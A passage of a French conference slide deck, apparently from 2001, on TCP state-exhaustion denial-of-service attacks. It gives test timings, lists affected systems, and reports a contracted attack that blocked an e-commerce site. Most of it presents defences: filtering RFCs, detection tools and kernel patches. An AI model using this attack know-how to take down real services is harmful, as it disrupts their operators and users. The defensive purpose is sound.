c'est long ... Tue Mar 20 12:10:22 CET 2001 4151 Tue Mar 20 12:10:23 CET 2001 4105 Enfin :) Tue Mar 20 12:12:29 CET 2001 13 Tue Mar 20 12:12:29 CET 2001 %font "def" Conclusion du test quelques minutes pour bloquer un service 15 min pour libérer le premier LAST_ACK, 8 min pour tout libérer Autres systèmes vulnérables : Win NT/2000, FreeBSD, NetBSD, AIX Seul OpenBSD semble résister ! %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Dernières attaques contre TCP Test grandeur réelle HSC mandaté par un client Contre un site de commerce électronique Plage horaire : la nuit hors production Architecture distante Seul port ouvert : HTTPS Filtrage routeur cisco + checkpoint firewall-1 Eléments redondants et boitiers alteon Serveurs Web : netscape enterprise server sous AIX Résultats Depuis 1 puis 2 machines pentium (200 et 300 Mhtz) Moins d'1/4 d'heure pour bloquer l'établissement SSL Un peu plus de 3/4 d'heure pour bloquer le site au niveau TCP L'attaque était réalisée depuis une seule machine Les boitiers alteon faisaient de l'équilibrage de charge selon l'adresse IP source %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Quelques éléments de réponse Contre les DOS Sécurisation des systèmes Mise à jour des systèmes Filtrage IP (ACL, Anti-spoofing ...) Tests (Nessus ...) Contre les DDOS rfc2267 : Network Ingress Filtering (spoofing) rfc2644 : Directed Broadcasts rfc3013 : Recommended ISP Security Services and Procedures ftp://www.ietf.org/rfc/rfc3013.txt Dave Dittrich http://staff.washington.edu/dittrich/misc/ddos/ Prévoir les DDOS dans l'architecture redondance, équilibrage de charges, trou noir dans le routage ... Rechercher les DDOS Nessus, dds, rid, gag, ramenfind, lionfind, chkrootkit, rkscan ... Détecter les DDOS (Snort) Plus tard ICMP traceback de Steve Bellovin http://www.research.att.com/~smb/talks/nanog-dos/index.htm %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Quelques éléments de réponse Contre les attaques sur TCP Exemple de patch : From: thinker Subject: Hang forever at LAST_ACK To: freebsd-security@freebsd.org %font "code", size 2 --------- begin patch file of sys/netinet/tcp_usrreq.c ---------- --- tcp_usrreq.c.orig Thu Mar 22 14:59:45 2001 +++ tcp_usrreq.c Thu Mar 22 15:04:49 2001 @@ -1139,13 +1139,15 @@ tp->t_state = TCPS_LAST_ACK; break; } - if (tp && tp->t_state >= TCPS_FIN_WAIT_2) { + if (tp && tp->t_state >= TCPS_FIN_WAIT_2) soisdisconnected(tp->t_inpcb->inp_socket); - /* To prevent the connection hanging in FIN_WAIT_2 forever. */ - if (tp->t_state == TCPS_FIN_WAIT_2) - callout_reset(tp->tt_2msl, tcp_maxidle, - tcp_timer_2msl, tp); - } + /* + * To prevent the connection hanging in FIN_WAIT_2 & + * TCPS_LAST_ACK forever. + */ + if (tp->t_state == TCPS_FIN_WAIT_2 || tp->t_state == TCPS_LAST_ACK) + callout_reset(tp->tt_2msl, tcp_maxidle, + tcp_timer_2msl, tp); return (tp); } %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Quelques éléments de réponse Contre les attaques sur TCP Idée de Denis Ducamp Considérer les FIN comme des RST dans certains états (Ca n'empeche pas les shutup) %font "code" /* TCP_SYN_SENT */ TCP_CLOSE, - /* TCP_SYN_RECV */ TCP_FIN_WAIT1 | TCP_ACTION_FIN, + /* TCP_SYN_RECV */ TCP_CLOSE, /* TCP_FIN_WAIT1 */ TCP_FIN_WAIT1, %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Quelques éléments de réponse Contre les attaques sur TCP Patch de NetBSD 1.5 (contre Naptha) %font "code" /* * Ack processing. */ switch (tp->t_state) { /* * In SYN_RECEIVED state if the ack ACKs our SYN then enter * ESTABLISHED state and continue processing, otherwise * send an RST. */ case TCPS_SYN_RECEIVED: /* * Simple protection against FIN|ACK in that state * (Stephane Aubert - HSC - 23/03/2001) */ if ((tiflags & TH_FIN) == 1 || SEQ_GT(tp->snd_una, th->th_ack) || SEQ_GT(th->th_ack, tp->snd_max)) goto dropwithreset; tcpstat.tcps_connects++; soisconnected(so); tcp_established(tp); %font "def" Le reste ... reste à trouver ! %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Questions / Réponses %vgap 10 Merci. %fore "darkgrey", right %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%